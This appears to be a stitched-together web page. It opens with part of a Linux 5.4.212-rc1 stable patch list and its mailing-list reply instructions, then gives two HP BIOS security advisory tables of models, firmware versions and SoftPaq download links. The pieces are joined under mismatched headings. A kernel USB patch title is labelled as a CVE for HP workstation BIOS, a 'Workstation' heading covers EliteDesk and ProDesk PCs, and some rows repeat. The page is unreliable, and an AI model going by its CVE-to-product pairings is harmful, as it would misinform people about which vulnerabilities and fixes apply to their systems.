2022-09-13 14:06 \` \[PATCH 5.4 072/108\] parisc: Add runtime check to prevent PA2.0 kernels on PA1.x machines Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 073/108\] arm64: cacheinfo: Fix incorrect assignment of signed error value to unsigned fw\_level Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 074/108\] arm64/signal: Raise limit on stack frames Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 075/108\] fbdev: chipsfb: Add missing pci\_disable\_device() in chipsfb\_pci\_init() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 076/108\] drm/amdgpu: mmVM\_L2\_CNTL3 register not initialized correctly Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 077/108\] ALSA: emu10k1: Fix out of bounds access in snd\_emu10k1\_pcm\_channel\_alloc() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 078/108\] ALSA: aloop: Fix random zeros in capture data when using jiffies timer Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 079/108\] ALSA: usb-audio: Fix an out-of-bounds bug in \_\_snd\_usb\_parse\_audio\_interface() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 080/108\] kprobes: Prohibit probes in gate area Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 081/108\] debugfs: add debugfs\_lookup\_and\_remove() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 082/108\] nvmet: fix a use-after-free Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 083/108\] scsi: mpt3sas: Fix use-after-free warning Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 084/108\] scsi: lpfc: Add missing destroy\_workqueue() in error path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 085/108\] cgroup: Optimize single thread migration Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 086/108\] cgroup: Elide write-locking threadgroup\_rwsem when updating csses on an empty subtree Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 087/108\] cgroup: Fix threadgroup\_rwsem <-> cpus\_read\_lock() deadlock Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 088/108\] smb3: missing inode locks in punch hole Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 089/108\] ARM: dts: imx6qdl-kontron-samx6i: remove duplicated node Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 090/108\] regulator: core: Clean up on enable failure Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 091/108\] RDMA/cma: Fix arguments order in net device validation Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 092/108\] soc: brcmstb: pm-arm: Fix refcount leak and \_\_iomem leak bugs Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 093/108\] RDMA/hns: Fix supported page size Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 094/108\] netfilter: br\_netfilter: Drop dst references before setting Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 095/108\] netfilter: nf\_conntrack\_irc: Fix forged IP logic Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 096/108\] rxrpc: Fix an insufficiently large sglist in rxkad\_verify\_packet\_2() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 097/108\] afs: Use the operation issue time instead of the reply time for callbacks Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 098/108\] sch\_sfb: Dont assume the skb is still around after enqueueing to child Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 099/108\] tipc: fix shift wrapping bug in map\_get() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 100/108\] i40e: Fix kernel crash during module removal Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 101/108\] RDMA/siw: Pass a pointer to virt\_to\_page() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 102/108\] ipv6: sr: fix out-of-bounds read when setting HMAC data Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 103/108\] RDMA/mlx5: Set local port to one when accessing counters Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 104/108\] nvme-tcp: fix UAF when detecting digest errors Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 105/108\] tcp: fix early ETIMEDOUT after spurious non-SACK RTO Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 106/108\] sch\_sfb: Also store skb len before calling child enqueue Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 107/108\] x86/nospec: Fix i386 RSB stuffing Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 108/108\] MIPS: loongson32: ls1c: Fix hang during startup Greg Kroah-Hartman
2022-09-14  9:37 \` \[PATCH 5.4 000/108\] 5.4.212-rc1 review Sudip Mukherjee
2022-09-14 11:43 \` Naresh Kamboju
2022-09-14 20:19 \` Florian Fainelli
2022-09-15  0:14 \` Guenter Roeck
2022-09-17  3:06 \` zhouzhixiu

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20220913140355.910732567@linuxfoundation.org \\
    --to=gregkh@linuxfoundation.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-4662: [PATCH 5.4 053/108] USB: core: Prevent nested device-reset calls

A potential security vulnerability has been identified in certain HP Workstation BIOS (UEFI firmware) which may allow arbitrary code execution. HP is releasing firmware mitigations for the potential vulnerability.

HP Z1 All-in-One G3 Workstation

BIOS (Windows 10, Windows 7)

01.31

Rev 3

SP139297

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139297.exe

HP Z1 All-in-One G3 Workstation

BIOS (Linux)

01.31

Rev 3

SP139296

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139296.tgz

HP Z2 Mini G3 Workstation

BIOS (Windows 10, Windows 7)

01.83

Rev 3

SP139300

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139300.exe

HP Z2 Mini G3 Workstation

BIOS (Linux)

01.83

Rev 3

SP139298

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139298.tgz

HP Z2 Mini G4 Workstation

BIOS (Windows 10, Windows 7)

01.08.01

Rev 3

SP139134

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139134.exe

HP Z2 Mini G4 Workstation

BIOS (Linux)

01.08.01

Rev 3

SP139133

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139133.tgz

HP Z2 Mini G5 Workstation

BIOS (Windows 10)

01.03.00 Rev A

Rev 1

SP136650

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136650.exe

HP Z2 Mini G5 Workstation

BIOS (Linux)

01.03.00 Rev A

Rev 1

SP136649

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136649.tgz

HP Z2 Small Form Factor G4 Workstation

BIOS (Windows 10, Windows 7)

01.08.01

Rev 3

SP139134

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139134.exe

HP Z2 Small Form Factor G4 Workstation

BIOS (Linux)

01.08.01

Rev 3

SP139133

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139133.tgz

HP Z2 Small Form Factor G5 Workstation

BIOS (Windows 10)

01.03.00 Rev A

Rev 1

SP136650

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136650.exe

HP Z2 Small Form Factor G5 Workstation

BIOS (Linux)

01.03.00 Rev A

Rev 1

SP136649

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136649.tgz

HP Z2 Small Form Factor G8 Workstation

BIOS (Windows 10)

01.03.00 Rev A

Rev 1

SP136247

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136247.exe

HP Z2 Small Form Factor G8 Workstation

BIOS (Linux)

01.03.00 Rev A

Rev 1

SP136246

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136246.tgz

HP Z2 Tower G4 Workstation

BIOS (Windows 10, Windows 7)

01.08.01

Rev 3

SP139134

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139134.exe

HP Z2 Tower G4 Workstation

BIOS (Linux)

01.08.01

Rev 3

SP139133

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139133.tgz

HP Z2 Tower G5 Workstation

BIOS (Windows 10)

01.03.00 Rev A

Rev 1

SP136650

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136650.exe

HP Z2 Tower G5 Workstation

BIOS (Linux)

01.03.00 Rev A

Rev 1

SP136649

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136649.tgz

HP Z2 Tower G8 Workstation

BIOS (Windows 10)

01.03.00 Rev A

Rev 1

SP136247

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136247.exe

HP Z2 Tower G8 Workstation

BIOS (Linux)

01.03.00 Rev A

Rev 1

SP136246

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136246.tgz

HP Z238 Microtower Workstation

BIOS (Windows 10, Windows 7)

01.83

Rev 3

SP139293

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139293.exe

HP Z238 Microtower Workstation

BIOS (Linux)

01.83

Rev 3

SP139292

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139292.tgz

HP Z240 Small Form Factor Workstation

BIOS (Windows 10, Windows 7)

01.83

Rev 3

SP139293

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139293.exe

HP Z240 Small Form Factor Workstation

BIOS (Linux)

01.83

Rev 3

SP139292

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139292.tgz

HP Z240 Tower Workstation

BIOS (Windows 10, Windows 7)

01.83

Rev 3

SP139293

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139293.exe

HP Z240 Tower Workstation

BIOS (Linux)

01.83

Rev 3

SP139292

https://ftp.hp.com/pub/softpaq/sp139001-139500/sp139292.tgz

HP Z4 G4 Workstation (Core-X)

BIOS (Windows 10, Windows 7)

02.75

Rev 1

SP136037

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136037.exe

HP Z4 G4 Workstation (Core-X)

BIOS (Linux)

02.75

Rev 1

SP136038

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136038.tgz

HP Z4 G4 Workstation (Xeon W)

BIOS (Windows 10, Windows 7)

02.75

Rev 1

SP136035

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136035.exe

HP Z4 G4 Workstation (Xeon W)

BIOS (Linux)

02.75

Rev 1

SP136036

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136036.tgz

HP Z440 Workstation

BIOS (Windows 10, Windows 7)

2.58

Rev 2

SP137086

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137086.exe

HP Z440 Workstation

BIOS (Linux)

2.58

Rev 2

SP137085

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137085.tgz

HP Z6 G4 Workstation

BIOS (Windows 10, Windows 7)

02.75

Rev 1

SP136033

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136033.exe

HP Z6 G4 Workstation

BIOS (Linux)

02.75

Rev 1

SP136034

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136034.tgz

HP Z640 Workstation

BIOS (Windows 10, Windows 7)

2.58

Rev 2

SP137086

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137086.exe

HP Z640 Workstation

BIOS (Linux)

2.58

Rev 2

SP137085

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137085.tgz

HP Z8 G4 Workstation

BIOS (Windows 10, Windows 7)

02.75

Rev 1

SP136033

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136033.exe

HP Z8 G4 Workstation

BIOS (Linux)

02.75

Rev 1

SP136034

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136034.tgz

HP Z840 Workstation

BIOS (Windows 10, Windows 7)

2.58

Rev 2

SP137086

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137086.exe

HP Z840 Workstation

BIOS (Linux)

2.58

Rev 2

SP137085

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137085.tgz

HP ZCentral 4R Workstation

BIOS (Windows 10)

01.18

Rev 2

SP138359

https://ftp.hp.com/pub/softpaq/sp138001-138500/sp138359.exe

HP ZCentral 4R Workstation

BIOS (Linux)

01.18

Rev 2

SP138358

https://ftp.hp.com/pub/softpaq/sp138001-138500/sp138358.tgz

CVE-2021-3661: HP Workstation BIOS February 2022 Security Update

A potential vulnerability has been identified in the system BIOS for certain HP PC products which may allow escalation of privileges and code execution. HP is releasing firmware updates to mitigate the potential vulnerability.

HP Elite Slice

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice for Meeting Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP EliteDesk 800 35W G2 Desktop Mini PC

BIOS

02.59

Rev 1

SP142710

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142710.exe

HP EliteDesk 800 35W G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142728

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142728.exe

HP EliteDesk 800 65W G2 Desktop Mini PC

BIOS

02.59

Rev 1

SP142710

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142710.exe

HP EliteDesk 800 65W G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142728

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142728.exe

HP EliteDesk 800 G2 Small Form Factor PC

BIOS

02.59

Rev 1

SP143397

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143397.exe

HP EliteOne 800 G2 23-inch Non-Touch All-in-One PC

BIOS

02.59

Rev 1

SP143409

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143409.exe

HP EliteOne 800 G2 23-inch Non-Touch All-in-One PC

BIOS

02.59

Rev 1

SP143409

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143409.exe

HP EliteOne 800 G2 23-inch Touch All-in-One PC

BIOS

02.59

Rev 1

SP143409

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143409.exe

HP EliteOne 800 G2 23-inch Touch All-in-One PC

BIOS

02.59

Rev 1

SP143409

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143409.exe

HP EliteOne 800 G3 23.8 Non-Touch Healthcare Edition All-in-One Business PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Non-Touch GPU All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Touch All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Touch GPU All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP ProDesk 400 G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142730

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142730.exe

HP ProDesk 400 G4 Microtower PC

BIOS

02.44

Rev 1

SP143381

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143381.exe

HP ProDesk 400 G4 Small Form Factor PC

BIOS

02.44

Rev 1

SP142713

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142713.exe

HP ProDesk 480 G4 Microtower PC

BIOS

02.44

Rev 1

SP143381

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143381.exe

HP ProDesk 600 G2 Desktop Mini PC

BIOS

02.59

Rev 1

SP142714

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142714.exe

HP ProDesk 600 G2 Microtower PC

BIOS

02.59

Rev 1

SP143399

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143399.exe

HP ProDesk 600 G2 Small Form Factor PC

BIOS

02.59

Rev 1

SP143399

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143399.exe

HP ProDesk 600 G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142729

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142729.exe

HP ProDesk 600 G3 Microtower PC

BIOS

02.44

Rev 1

SP143379

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143379.exe

HP ProDesk 600 G3 Small Form Factor PC

BIOS

02.44

Rev 1

SP142708

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142708.exe

HP ProDesk 680 G2 Microtower PC

BIOS

02.59

Rev 1

SP143399

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143399.exe

HP ProDesk 680 G3 Microtower PC

BIOS

02.44

Rev 1

SP143379

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143379.exe

HP ProOne 400 G2 20-inch Non-Touch All-in-One PC

BIOS

02.59

Rev 1

SP143414

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143414.exe

HP ProOne 400 G2 20-inch Touch All-in-One PC

BIOS

02.59

Rev 1

SP143414

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143414.exe

HP ProOne 400 G3 20-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 400 G3 20-inch Touch All-in-One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 480 G3 20-inch Non-Touch All-in One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 600 G2 21.5-inch Non-Touch All-in-One PC

BIOS

02.59

Rev 1

SP143411

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143411.exe

HP ProOne 600 G2 21.5-inch Touch All-in-One PC

BIOS

02.59

Rev 1

SP143411

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143411.exe

HP ProOne 600 G3 21.5-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142696

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142696.exe

Tag

#bios